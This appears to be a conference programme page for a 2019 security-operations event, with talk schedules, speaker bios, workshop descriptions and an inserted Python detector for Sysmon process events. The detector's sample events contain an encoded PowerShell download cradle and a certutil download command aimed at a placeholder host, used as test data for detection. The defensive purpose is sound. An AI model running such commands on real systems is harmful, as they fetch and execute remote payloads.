Time | Monday, 1 April - Rathuse Park | Monday, 1 April - Serengeti Park
---|---|---
08:30 – 10:00 | Registration/Coffee | 
10:00 – 14:00 | Boss of the SOC (Splunk) | Breach Detection and Remediation Lab (Cisco)
Time | Tuesday, 2 April - AMS5-1 - KRUGER/YELLOWSTONE | Speaker(s)
---|---|---
08:30 – 09:30 | Registration/Coffee | 
09:30 – 09:45 | Welcome from Conference Co-Chairs | Jeff Bollinger (LinkedIn, US); Matthew Valites (SAP, US)
09:45 – 10:30 | Enriching Feature Sets With Layered Microservices -- a Passive DNS Workbench | Paul Vixie (Farsight Security, US)
10:30 – 11:15 | Tessa88 - Uncovering the True Identity of the Notorious Hacker | Andrei Barysevich (Recorded Future, US)
11:15 – 11:45 | Networking Break | 
11:45 – 12:30 | AI Gone Rogue: Exterminating Deep Fakes Before They Cause Menace | Vijay Thaware (Symantec, IN)
12:30 – 13:15 | Automatic discovery of malicious websites in NOD | Jingyu Bao, Litao Wu (Netlab, CN); Yang Xu (NetLab, CN)
13:15 – 14:15 | LUNCH - Thanks Farsight! | 
14:15 – 15:00 | Incident response in the age of serverless: A case study on GCP | Anastasios Pingios, Willem Gerber (Booking.com, NL)
15:00 – 15:15 | Networking Break | 
15:15 – 16:00 | Trick or treat? Unveil the "Stratum" of the mining pools | Emilien Le Jamtel (CERT-EU, BE); Ioana Todirica (BE)
16:00 – 16:45 | Active Directory forensics with replication metadata: ADTimeline tool | Leonard Savina (ANSSI, FR)
17:15 – 19:30 | | 
Time | Wednesday, 3 April - AMS5-1 - KRUGER/YELLOWSTONE | Speaker(s)
---|---|---
08:30 – 09:30 | Registration/Coffee | 
09:30 – 09:45 | Welcome from FIRST - Gavin Reid, Conference Co-Chair | Gavin Reid (HUMAN Security, US)
09:45 – 10:30 | The Dark side of the (SHA)Moon | Christiaan Beek (McAfee, NL)
10:30 – 11:15 | SOC-CMM & MaGMa - Tools for effective Cyber Defense | Rob van Os (Volksbank, NL)
11:15 – 11:45 | Networking Break | 
11:45 – 12:30 | | John Stoner (US)
12:30 – 13:15 | Premediation: The Art of Proactive Remediation | Manfred Erjak (Mandiant, AT); Matthew McWhirt (Mandiant, US)
13:15 – 14:15 | LUNCH - Thanks Farsight! | 
14:15 – 15:00 | Atomic Threat Coverage: make ATT&CK great again! | Daniil Yugoslavskiy (Tieto, CZ); Mateusz Wydra (Tieto, PL); Mikhail Aksenov (BI.ZONE, RU)
15:00 – 15:15 | Networking Break | 
15:15 – 16:00 | RoAMer: The Robust Automated Malware Unpacker | Thorsten Jenke (Fraunhofer, DE)
16:00 – 16:45 | Endpoint Detection Super Powers on the cheap, with Sysmon | Olaf Hartong (FalconForce, NL)
Leonard Savina (ANSSI, FR)
Savina has a Master of Engineering degree in telecommunications and digital signal processing and started working in IT support in 2003. He specializes in Microsoft infrastructures as a system administrator and IT architect and has been maintaining, securing, deploying, migrating, automating and designing Active Directory environments for about 10 years in sectors such as energy, hospitals and government. Savina is active on Twitter (@ldap389) and blogs at https://ldap389.info/en. In 2017 he joined CERT-FR as a DFIR analyst, where he applies that experience to handling and investigating cybersecurity incidents.
April 2, 2019 16:00-16:45
MD5: c18c3bfc3b011ce398ad0fa3dc787ed2
Format: application/pdf
Last Update: June 7th, 2024
Size: 954.83 Kb
Vijay Thaware (Symantec, IN)
Vijay Thaware has been working at Symantec's STAR Anti-Spam Team for the last seven years as Security Response Lead. He is involved in anti-spam, anti-fraud, and anti-malware content development and automation. His day-to-day work involves investigation and research on latest email threats in order to present effective solutions. He is also an international speaker and has presented POCs at BlackHat USA 2017 (Las Vegas) and BlackHat Europe 2018 (London).
April 2, 2019 11:45-12:30
Daniil Yugoslavskiy (Tieto, CZ), Mateusz Wydra (Tieto, PL), Mikhail Aksenov (BI.ZONE, RU)
Daniil leads the Threat Detection team at the Tieto Security Operations Center (SOC) in Ostrava, Czech Republic. Before that, he was responsible for process and systems architecture development at the Informzaschita SOC in Moscow, Russia. Daniil has spent more than six years in the practical computer security and network monitoring domains. He is an Offensive Security Certified Professional (OSCP), Cisco Certified Network Professional Security (CCNP Security), GIAC Network Forensic Analyst (GNFA) and a member of the GIAC Advisory Board. He has spoken at Code Europe, CONFidence and the EU MITRE ATT&CK community workshops on implementing an intelligence-driven defence approach and operationalizing MITRE ATT&CK. Daniil is also the Krakow 2600 Meetings coordinator and creator of the Atomic Threat Coverage project.
Mateusz is a former Threat Detection specialist and currently works as an Incident Responder in the Tieto SOC in Krakow, Poland. Before Tieto, he worked for the Cisco SOC as a Security Analyst. He holds the GIAC Certified Forensic Analyst (GCFA) and CCNA Cyber Ops certifications and is a member of the GIAC Advisory Board. Mateusz is also a Krakow 2600 Meetings coordinator and co-creator of the Atomic Threat Coverage project.
Mikhail leads the BI.ZONE Security Operations Center (SOC) Automation team in Moscow, Russia. Before that he was responsible for automated security assessment and governance. Mikhail has spoken at OWASP Russia 2016 and PHDays 2018 about automated security assessment in large and highly distributed networks. He is also a co-creator of the Atomic Threat Coverage project.
April 3, 2019 14:15-15:00
Jingyu Bao (Netlab, CN), Litao Wu (Netlab, CN), Yang Xu (NetLab, CN)
JINGYU BAO is a security engineer. He currently works in the passive DNS team of Netlab, focusing on cyber threat discovery, intelligence traceability and data analysis.
LITAO WU is a software engineer with a passion for back-end development. He has extensive experience in web development and data analysis. He now works at Netlab, where he builds large-scale data stream systems to capture popular attacks in cyberspace.
YANG XU has been a cyber security analyst since 2010 and is currently a member of the Network Security Research Lab at Qihoo 360 (Netlab), where he focuses on network traffic and DNS data processing and analysis and on threat research. Before joining NetLab, he was a security engineer at NSFOCUS and was involved in many projects, such as SoC architecture design and implementation and intranet traffic anomaly detection.
April 2, 2019 12:30-13:15
Automatic-discovery-of-malicious-websites-in-NOD.pdf
MD5: 5160d60726832cc3e01dc898b4b50671
Format: application/pdf
Last Update: June 7th, 2024
Size: 9.52 Mb
Boss of the SOC (Splunk)
Boss of the SOC is a blue-team jeopardy-style capture-the-flag-esque (CTF) activity where participants use Splunk—and other tools—to answer a variety of questions about security incidents that have occurred in a realistic but fictitious enterprise environment. It's designed to emulate how real security incidents look in Splunk and the type of questions analysts have to answer. We developed Boss of the SOC because we were tired of showing up at security conferences and finding the CTFs to be entirely red-team oriented. There are other Blue Team CTFs out there—especially the grandfather to them all SANS DFIR NetWars—but few (or none) of them attempt to recreate the life of a security analyst facing down an adversary at all stages of an attack.
April 1, 2019 10:00-14:00
Breach Detection and Remediation Lab (Cisco)
This lab takes you through an attack campaign that mimics skillful attackers and skillful defenders alike. The main goal of the lab is to demonstrate a realistic infection using the latest techniques that work today. You might be a security analyst, incident responder, security architect or security manager and still get a lot from this lab. We provide plenty of explanation and a minimum of mindless clicking. The goal is to teach you how attackers think when developing stealthy techniques to exfiltrate data, gain privileges and gather information from infected machines: you attack, you defend! A good hour of the lab takes you through building an integrated architecture suitable for threat hunting with AMP for Endpoints, Threat Grid, Threat Response, Splunk, osquery and Sysmon. We collect process execution logs, PowerShell transcripts, service logs and much more. We also use many APIs to gather information into one place, but use web interfaces where appropriate.
April 1, 2019 10:00-14:00
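The lab above collects Sysmon process execution logs for threat hunting, and Olaf Hartong's Wednesday talk covers the same telemetry. As an added example that is not part of the lab materials or of this page, the Python below runs three detections a hunter typically starts with over Sysmon Event ID 1 (process creation) records: an Office application spawning a shell or script host, an encoded PowerShell command line (decoded so the analyst sees the payload), and certutil used as a downloader. The field names follow Sysmon's own event schema; the flat key/value layout, the sample records and the rule thresholds are assumptions made for the example.

```python
import base64
import re
from typing import Dict, List, Optional

# Parent/child pairs that rarely occur in normal use: an Office document should not
# be starting a command interpreter or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, -ec, ...),
# so the pattern matches every prefix followed by a base64 blob of plausible length.
_ENC_PREFIXES = "|".join("encodedcommand"[:i] for i in range(1, 15))
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:" + _ENC_PREFIXES + r")\s+([A-Za-z0-9+/=]{16,})")
CERTUTIL_ABUSE = re.compile(r"(?i)-(?:urlcache|decode)\b")


def _ps_encode(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample Sysmon Event ID 1 records (not captured from a real host), in the
# flat field layout a forwarder such as winlogbeat presents to Splunk.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # Word launching a hidden, encoded PowerShell download cradle
        "UtcTime": "2019-04-01 10:12:03.117", "User": "CORP\\alice",
        "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc "
                       + _ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    },
    {   # Ordinary interactive activity: must produce no finding
        "UtcTime": "2019-04-01 10:13:40.002", "User": "CORP\\alice",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "Image": "C:\\Windows\\System32\\notepad.exe",
        "CommandLine": "\"C:\\Windows\\System32\\notepad.exe\" notes.txt",
    },
    {   # certutil used as a downloader, a living-off-the-land technique
        "UtcTime": "2019-04-01 10:15:09.551", "User": "CORP\\alice",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "Image": "C:\\Windows\\System32\\certutil.exe",
        "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/x.bin C:\\Users\\Public\\x.bin",
    },
    {   # Scheduled script: -ExecutionPolicy is not -EncodedCommand and must not trip the rule
        "UtcTime": "2019-04-01 10:20:00.000", "User": "NT AUTHORITY\\SYSTEM",
        "ParentImage": "C:\\Windows\\System32\\services.exe",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    },
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, for case-insensitive comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none or it is malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: Dict[str, str]) -> List[Dict[str, str]]:
    """Apply the three rules to one process-creation event and return the findings."""
    findings: List[Dict[str, str]] = []
    image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if parent in OFFICE_PARENTS and image in SHELL_CHILDREN:
        findings.append({"rule": "office_spawns_shell", "detail": f"{parent} -> {image}"})
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append({"rule": "encoded_powershell", "detail": decoded})
    if image == "certutil.exe" and CERTUTIL_ABUSE.search(cmd):
        findings.append({"rule": "certutil_lolbin", "detail": cmd})
    return findings


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one entry per event that produced at least one finding, in input order."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        findings = analyze_event(ev)
        if findings:
            hits.append({"UtcTime": ev.get("UtcTime"), "User": ev.get("User"), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in analyze(SAMPLE_EVENTS):
        for f in hit["findings"]:
            print(f"{hit['UtcTime']} {hit['User']} [{f['rule']}] {f['detail']}")
```

Decoding the encoded command rather than merely flagging it matters in practice: the decoded text is what the analyst needs to pivot on (the download URL, the next stage), and the same regex also has to ignore the look-alike `-ExecutionPolicy` switch that legitimate scheduled tasks use constantly.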
Olaf Hartong (FalconForce, NL)
Olaf Hartong is a Defensive Specialist and security researcher at FalconForce. He specializes in understanding the attacker tradecraft and thereby improving detection. He has a varied background in blue and purple team operations, network engineering, and security transformation projects.
Olaf has presented at many industry conferences including Black Hat, DEF CON, DerbyCon, Splunk .conf, FIRST, MITRE ATT&CKcon, and various other conferences. Olaf is the author of various tools including ThreatHunting for Splunk, ATTACKdatamap and Sysmon-modular. He maintains a blog at https://olafhartong.nl
April 3, 2019 16:00-16:45
Paul Vixie (Farsight Security, US)
Paul Vixie serves as VP and Distinguished Engineer at AWS Security, and is a Director at SIE Europe U.G. He was previously the founder and CEO of Farsight Security (2013-2021). In addition, he founded and operated the first anti-spam company (MAPS, 1996), the first non-profit Internet infrastructure software company (ISC, 1994), and the first neutral and commercial Internet exchange (PAIX, 1991). Vixie was inducted into the Internet Hall of Fame in 2014 for work related to DNS, and is a prolific author of open source Internet software including Cron and BIND, and of many Internet standards concerning DNS and DNSSEC. He was CTO at Abovenet/MFN (1999-2001) and worked at DEC Western Research Lab (1988-1993) after dropping out of school in 1980. Vixie earned his Ph.D. in Computer Science from Keio University in 2011.
April 2, 2019 09:45-10:30
2019-04-Enriching-Feature-Sets-With-Layered-Microservices-FSWB.pdf
MD5: 16c6a01e3f594f6470f22327b509fb4f
Format: application/pdf
Last Update: June 7th, 2024
Size: 358.55 Kb
Anastasios Pingios (Booking.com, NL), Willem Gerber (Booking.com, NL)
Anastasios Pingios is a security professional who started from the exploit development and vulnerability research side around 15 years ago and later on switched to the defensive side. He holds a M.Sc. in Secure Computing Systems from the University of Hertfordshire, numerous certifications on the subject of intelligence collection and intelligence analysis, and has presented a wide variety of topics from unconventional phishing techniques, to secure architecture in the cloud, and building successful intelligence teams. Currently, Anastasios is Principal Security Engineer at Booking.com and for the last few years he has been focusing on threat intelligence from a holistic perspective that takes into account all domains instead of just cyber.
Willem Gerber started with security as a hobby and it has turned into a full-time career. Currently Willem Gerber works as Senior Security Engineer for Cloud Security in Booking.com.
April 2, 2019 14:15-15:00
Manfred Erjak (Mandiant, AT), Matthew McWhirt (Mandiant, US)
Manfred Erjak is a principal consultant within Mandiant's Security Transformation Services (STS) team and is based in Austria. He is a trusted information security expert and distinguished IT network architect with over 20 years of experience working with utilities, manufacturing, technology, pharmaceutical and Fortune 500 companies. His primary focus is on leading and executing remediation activities, but he also provides expertise with incident response.
Prior to joining Mandiant, Manfred served various information security expert and system architect roles at Infineon Technologies and Cisco Systems. Manfred holds a bachelor’s in network engineering and master’s degrees in communication engineering from the Carinthia University of Applied Sciences.
Matthew McWhirt is a Manager within Mandiant’s Security Transformation Services (STS) team – specializing in remediation and enterprise architecture assessments and hardening. Matthew has over 12 years of experience specializing in security architecture, Active Directory security, and enterprise incident response. Prior to joining Mandiant, Matthew worked as a unit chief within DHS ICS-CERT, specializing in SCADA system security, ICS architecture reviews, and network device security.
April 3, 2019 12:30-13:15
Thorsten Jenke (Fraunhofer, DE)
Thorsten started working full time at Fraunhofer FKIE. Among his tasks as a research assistant are reverse engineering malware and implementing software for automating malware analysis.
April 3, 2019 15:15-16:00
MD5: a45341cae6984147652d1cdfd9b19c70
Format: application/pdf
Last Update: June 7th, 2024
Size: 227.71 Kb
Rob van Os (Volksbank, NL)
Rob van Os, MSc., CISSP, ISSAP is a cyber defense specialist and the Product Owner of the Cyber Defense Center of the Volksbank, where he is responsible for cyber security operations. Rob has over a decade of practical experience in security monitoring, security incident response and security operations centers. He is also the chairman of the SOC/CSIRT working group of the Dutch FI-ISAC. Rob obtained a Bachelor's degree in Computer Science in 2009 and a Master's degree in Information Security in 2016. Rob is the author of the SOC-CMM and the MaGMa use case framework.
With DDoS attacks becoming ‘business as usual’, and widespread ransomware outbreaks such as WannaCry wreaking havoc across the globe, organisations face a challenging and dynamic threat landscape. This is why Security Operations Centers (SOCs) are becoming increasingly common. A SOC provides capabilities to protect against cyber threats, detect attacks and intrusion attempts and respond to such threats to limit their impact. To objectively evaluate if security operations are functioning effectively and maturing over time, measurement tools are required. The SOC-CMM and MaGMa Use Case Framework (MaGMa UCF) are such tools, and aim to enhance cyber defense. Both tools can be used freely.
The SOC-CMM is a model and self-assessment tool that is used to measure SOC capability maturity across 5 domains: business, people, process, technology and services. Each of these domains is assessed in detail using questions that can be scored on a 5-point scale. Using the SOC-CMM, the SOC team can identify strong and weak aspects, and determine next steps for improvement and growth.
The MaGMa UCF is a framework for use case management. This framework is supported by a tool that allows for registration, classification and measurement of use case effectiveness. The MaGMa UCF provides the capability to be in control over the security monitoring process and the alignment of security monitoring to business and compliance needs. With the MaGMa UCF, it is possible to prove to stakeholders that the SOC is in control and adequately managing and decreasing risk in the enterprise.
April 3, 2019 10:30-11:15
2019.04.03-SOC-CMM-MaGMa-FIRST.pdf
MD5: 5ee1a54b59f731a9a207fab39344a487
Format: application/pdf
Last Update: June 7th, 2024
Size: 6.01 Mb
Andrei Barysevich (Recorded Future, US)
Andrei Barysevich is the VP of Fraud Solutions at Recorded Future. Previously, Andrei built a leading Fraud Intelligence company Gemini Advisory, now a Recorded Future company, supporting Top-3 Card Networks, largest financial institutions, and federal and international law enforcement agencies. Leveraging Gemini's fraud intelligence tools, Andrei's team identified thousands of payment card data breaches, discovered novel attack techniques, and dismantled numerous Magecart campaigns operated by the financially-motivated threat groups.
For the past 15 years, he has been involved in multiple high-profile international cases resulting in successful convictions of members of crime syndicates operating global reshipping, money laundering, and bank fraud schemes.
April 2, 2019 10:30-11:15
Christiaan Beek (McAfee, NL)
Christiaan Beek, lead scientist and senior principal engineer, is part of McAfee's Office of the CTO, leading strategic threat intelligence research within McAfee. He coordinates and passionately leads research into advanced attacks, plays a key role in cyberattack take-down operations and participates in the NoMoreRansom project. In previous roles, Beek was Director of Threat Intelligence in McAfee Labs and Director of Incident Response and Forensics at Foundstone, McAfee's forensic services arm. At Foundstone, he led a team of forensic specialists in Europe, the Middle East and Africa during major breaches. Beek develops threat intelligence strategy, designs threat intelligence systems, performs malware and forensic analysis and pentesting, and coaches security teams around the globe. He is a passionate cybercrime specialist who has developed training courses, workshops and presentations. He speaks regularly at conferences, including BlackHat, RSA, BlueHat and Botconf. Besides conferences, he also frequently teaches at universities, police academies and public schools to recruit, mentor and train the next generation of cyber-security specialists. Beek contributed to the best-selling security book "Hacking Exposed" and has two patents pending. Twitter: @ChristiaanBeek
April 3, 2019 09:45-10:30
Emilien Le Jamtel (CERT-EU, BE), Ioana Todirica (BE)
Emilien Le Jamtel is a security analyst working for CERT-EU.
April 2, 2019 15:15-16:00
MD5: 690e5b523ad5ca75736aa90bec9e2a0e
Format: application/pdf
Last Update: June 7th, 2024
Size: 2.54 Mb
John Stoner (US)
April 3, 2019 11:45-12:30
MD5: 7426cb41fabc8c7622e509d7eded8a6e
Format: application/pdf
Last Update: June 7th, 2024
Size: 73.25 Mb
Jeff Bollinger (LinkedIn, US), Matthew Valites (SAP, US)
Jeff Bollinger joined Cisco Systems in 2002 supporting Cisco's security technologies and solutions in Cisco's global technical support organization. Jeff later moved to the Computer Security Incident Response Team (CSIRT) and rapidly developed its global security monitoring and incident response capabilities. With over fifteen years of information security experience, Jeff Bollinger has worked as a security architect, incident responder and people manager for both academic and enterprise networks. Specializing in investigations, network security monitoring, log analysis and intrusion detection, Jeff Bollinger currently manages Cisco's SOC and investigations teams in the western hemisphere. Jeff helped build and operate one of the world's largest corporate security monitoring infrastructures. Jeff regularly speaks at international FIRST conferences and occasionally writes for the Cisco Security Blog. He is also the co-author of "Crafting the InfoSec Playbook". Jeff's recent work includes log mining, search optimization, cloud threat research and security investigations.
Matthew Valites - With over a decade of Information Security experience, Matthew has worked on Cisco’s CSIRT as both an Investigator and Investigations Manager, and most recently at Splunk as a Senior Security Specialist. He provides expertise building security monitoring and Incident Response programs for cloud and hosted service enterprises, focusing on targeted and high-value assets via a threat-centric methodology. He is a published author with a proven ability to run global, high-profile, service and revenue impacting, and complex multi-faceted investigations. Matthew strives to both learn from and share his knowledge with a global InfoSec community.
April 2, 2019 09:30-09:45
Gavin Reid (HUMAN Security, US)
Gavin Reid is the chief security architect and head of threat research for Recorded Future. His focus is on next-generation threats and the role that threat intelligence can play in identifying and combating them. He serves as a subject matter expert on information security architecture, threat intelligence analysis, and associated initiatives. Reid also works with cybersecurity groups to ensure Recorded Future has the needed sources of data and relationships to be the premier provider of threat intelligence.
With over 25 years of experience in threat intelligence, he was a driving force behind the development of big data analytics and threat identification. This experience is exemplified in his role at Cisco Systems as director of threat research for security intelligence operations, where he led a team that developed new data analytics technologies to detect and remediate advanced cybersecurity threats. Reid also created and led Cisco’s Computer Security Incident Response Team (CSIRT), a global organization of information security professionals responsible for monitoring, investigating, and responding to cybersecurity incidents. In addition to his time at Cisco, Reid also served as the vice president of the cyber threat intelligence group at Fidelity Investments and oversaw IT security at NASA’s Johnson Space Center.
April 3, 2019 09:30-09:45